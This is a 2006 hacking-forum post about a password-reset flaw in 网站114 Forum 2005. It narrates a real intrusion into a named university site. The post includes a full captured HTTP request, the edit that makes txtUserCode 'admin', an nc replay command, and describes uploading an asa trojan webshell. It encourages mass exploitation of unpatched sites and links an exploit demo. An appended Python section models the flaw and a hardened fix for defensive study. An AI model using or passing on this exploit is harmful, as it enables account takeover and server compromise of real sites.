
网站114 Forum 2005 Official Release Vulnerability

2006-3-4 01:27 | Submitted by: security

Keyword: "版权所有 设计制作:网站114"

Vulnerability description: in the 网站114 Forum 2005 official release, /edituserdb.asp does not validate the submitted data or the cookies, so any user can change the administrator's password. The default back end is admin/index.asp.

I used it today while going after a machine in a hosting room through a neighbouring site (旁注). http://www.gxmu.net.cn/xzl/BBS/index.asp is a forum on the Guangxi Medical University website. I registered a user, 33221, then went to /edituserdb.asp, clicked "修改注册" (edit registration) and started capturing packets. I saved the captured content in Notepad; it is as follows:

-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"


-----------------------------7d61e41d605f6--
-----------------------------------------------------------------------------------------------------------

In it, in this part:

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6

change the first "33221" to "admin" and save it as 11.txt; the text is then:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"


-----------------------------7d61e41d605f6--

Because the username I registered, 33221, is the same length as admin, the byte length does not need to be changed here. Then submit it to the server with nc:

nc www.gxmu.net.cn 80 < 11.txt

The server responds that the member profile was modified successfully. Then log in as admin with the same password that was set when registering 33221. That is of course administrator privilege. Then log into the back end, click "修改栏目" (edit sections), upload an asa trojan, OK, webshell obtained. I had a look: there is no patch for this forum system yet, so a large batch of webshells could be taken, but I only took the one server that was useful to me and did not bother with the others. If anything is still unclear, you can watch the animated demo: http://www.ncph.net/soft/114论坛最新漏洞利用动画.rar

A rubbish vulnerability; this is written for newbies, so experts please don't flame me.
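As an added example (not the forum's own ASP code, which the write-up does not show), the Python below models the account-update logic the write-up describes: once as the flawed handler that picks the record to update from the submitted txtUserCode, and once hardened so the update is bound to the authenticated session user and a mismatching txtUserCode is rejected. The parser, the sample body (the three relevant fields from the capture above, with txtUserCode already set to admin) and the account table are constructed for illustration, and the admin password is a placeholder.

```python
import re

# Boundary value as it appears in the captured Content-Type header above.
BOUNDARY = "---------------------------7d61e41d605f6"

# Constructed sample body: the three relevant fields, txtUserCode already changed to "admin".
SAMPLE_BODY = "\r\n".join([
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="txtUserCode"', "", "admin",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="txtPassword"', "", "33221",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="txtConfirmPassword"', "", "33221",
    f"--{BOUNDARY}--", "",
])

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser returning {field name: value}."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble, or the closing "--"
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r';\s*name="([^"]*)"', headers)  # matches "; name=", not "filename="
        if m:
            fields[m.group(1)] = value
    return fields

def fresh_accounts() -> dict:
    """Constructed user table; the admin password is a placeholder value."""
    return {"admin": {"password": "ADMIN-PW-PLACEHOLDER"}, "33221": {"password": "33221"}}

def save_user_vulnerable(accounts: dict, session_user, fields: dict) -> str:
    """Flawed logic as the write-up describes it: the record to update is
    whatever txtUserCode names; the session identity is never consulted."""
    if fields["txtPassword"] != fields["txtConfirmPassword"]:
        return "password mismatch"
    target = fields["txtUserCode"]
    accounts[target]["password"] = fields["txtPassword"]
    return f"updated {target}"

def save_user_hardened(accounts: dict, session_user, fields: dict) -> str:
    """Fix: the target is the authenticated session user; a txtUserCode naming
    anyone else is rejected (and is worth logging as a tampering attempt)."""
    if session_user is None:
        return "rejected: not logged in"
    if fields.get("txtUserCode", session_user) != session_user:
        return f"rejected: txtUserCode {fields['txtUserCode']!r} != session user {session_user!r}"
    if fields["txtPassword"] != fields["txtConfirmPassword"]:
        return "password mismatch"
    accounts[session_user]["password"] = fields["txtPassword"]
    return f"updated {session_user}"
```

Running both handlers on parse_multipart(SAMPLE_BODY, BOUNDARY) with session user "33221" shows the difference: the flawed one overwrites the admin password, the hardened one refuses the request and leaves the admin record untouched.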
